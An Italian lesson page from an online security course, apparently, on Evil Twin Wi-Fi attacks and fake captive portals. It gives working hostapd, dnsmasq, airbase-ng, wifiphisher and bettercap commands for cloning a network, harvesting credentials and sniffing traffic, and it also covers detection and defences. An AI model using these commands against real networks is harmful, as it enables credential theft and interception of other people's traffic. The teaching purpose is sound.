Attacchi Evil Twin e captive portal
Configurate un AP malevolo per eseguire attacchi Evil Twin e raccogliere credenziali tramite captive portal falsi.
Attacchi Evil Twin e captive portal è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 3 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.
Panoramica sugli evil twin
Un evil twin è un access point rogue che trasmette lo stesso SSID di una rete legittima. I client che vi si connettono inviano tutto il traffico attraverso l'attaccante, consentendo la raccolta delle credenziali, l'intercettazione del traffico e il phishing.
Come i client scelgono gli AP
I client Wi-Fi si connettono all'SSID noto con il segnale più forte e parametri di sicurezza corrispondenti. Trasmettendo a potenza maggiore (o deautenticando i client dall'AP legittimo), un evil twin può attirare le connessioni.
Creazione di un AP rogue con Hostapd
Hostapd crea un access point software. In combinazione con DHCP (dnsmasq) e il NAT di iptables, fornisce un access point funzionante che instrada il traffico e ne consente l'intercettazione.
# hostapd.conf:
interface=wlan0
driver=nl80211
ssid=TargetNetwork
channel=6
hw_mode=g
# Start AP
hostapd hostapd.conf
# Start DHCP
dnsmasq --interface=wlan0 \
--dhcp-range=192.168.10.100,192.168.10.200,12hUtilizzo di airbase-ng
airbase-ng (parte della suite aircrack-ng) crea AP rogue direttamente dall'interfaccia in modalità monitor, offrendo una soluzione più semplice per le configurazioni di base degli evil twin.
# Create open evil twin
airbase-ng -e "TargetNetwork" -c 6 wlan0mon
# Create WPA2 evil twin (same key as legitimate)
airbase-ng -e "TargetNetwork" -z 4 -W 1 -c 6 wlan0monAttacco tramite captive portal
Un captive portal è una pagina web che intercetta tutto il traffico HTTP e presenta una pagina di login, come avviene comunemente negli hotel e negli aeroporti. Gli attaccanti creano captive portal rogue che raccolgono credenziali o password Wi-Fi.
Phishing Wi-Fi con WiFi-Pumpkin / Wifiphisher
Gli strumenti automatizzati creano ambienti evil twin completi con captive portal progettati per assomigliare alle pagine legittime di configurazione del router o alle pagine di login degli ISP.
# Wifiphisher
sudo wifiphisher --essid "TargetNetwork"
# Phishing scenarios:
# - Router firmware upgrade page (harvests Wi-Fi PSK)
# - OAuth login (harvests credentials)
# - Browser plugin update (delivers malware)SSL stripping
Gli attacchi evil twin si basavano tradizionalmente sullo stripping SSL (sslstrip) per effettuare il downgrade da HTTPS a HTTP. I moderni HSTS e il pre-caricamento HSTS hanno in gran parte contrastato questa tecnica, ma i siti non ancora visitati o che non usano HSTS restano vulnerabili.
# Historical sslstrip approach:
# iptables REDIRECT port 80
# sslstrip intercepts and downgrades HTTPS to HTTP
# Modern defense: HSTS preload list
# Sites listed are HTTPS-only in browsers
# Cannot be strippedAcquisizione delle credenziali tramite evil twin
Con un AP rogue e Wireshark o Bettercap, è possibile acquisire tutte le credenziali HTTP in chiaro, le query DNS che rivelano i siti visitati e i protocolli applicativi non cifrati (FTP, SMTP, POP3).
# Bettercap for MitM
bettercap -iface wlan0
# In bettercap console:
net.probe on
net.sniff on
https.proxy on
arp.spoof onSupporto alla deautenticazione per evil twin
Forzi i client a connettersi al proprio evil twin inviando continuamente frame di deautenticazione per disconnetterli dall'AP legittimo. Si riconnetteranno al segnale più forte, cioè al proprio AP rogue.
Rilevamento degli attacchi evil twin
I difensori rilevano gli evil twin tramite: WIDS (sistemi di rilevamento delle intrusioni wireless), che verificano la presenza di SSID duplicati su BSSID diversi, anomalie del segnale e client che utilizzano WPA2-Enterprise basato su certificati (immune agli evil twin basati su PSK).
Difese
Per prevenire gli evil twin, utilizzi WPA2/WPA3-Enterprise (EAP-TLS): anche la connessione a un AP rogue richiede un certificato valido. Abiliti 802.11w PMF, utilizzi una VPN aziendale che si connette automaticamente quando il dispositivo è al di fuori delle reti attendibili e implementi WIDS per il monitoraggio degli AP.
Verifica rapida
Perché WPA2-Enterprise con EAP-TLS impedisce la raccolta delle credenziali tramite evil twin?
Riepilogo: evil twin e captive portal
Gli attacchi evil twin sfruttano il fatto che i client si fidano degli SSID più che dell'identità crittografica. Un AP rogue con un nome corrispondente può intercettare il traffico, raccogliere credenziali tramite captive portal ed eseguire attacchi MitM. La difesa richiede l'autenticazione reciproca (certificati EAP-TLS), VPN aziendali e il monitoraggio tramite WIDS, non soltanto password Wi-Fi robuste.
Domande Frequenti
La lezione «Attacchi Evil Twin e captive portal» è gratuita?
Sì — il testo completo di «Attacchi Evil Twin e captive portal» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.
Cosa imparerò in «Attacchi Evil Twin e captive portal»?
Configurate un AP malevolo per eseguire attacchi Evil Twin e raccogliere credenziali tramite captive portal falsi. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Cyber Security Academy?
Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 3 di 4.
Quanto tempo richiede la lezione «Attacchi Evil Twin e captive portal»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?
Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Protocolli di sicurezza 802.11: WEP, WPA2, WPA3
- Cattura e cracking dell'handshake WPA2
- Attacchi Evil Twin e captive portal
- Wi-Fi aziendale: EAP e RADIUS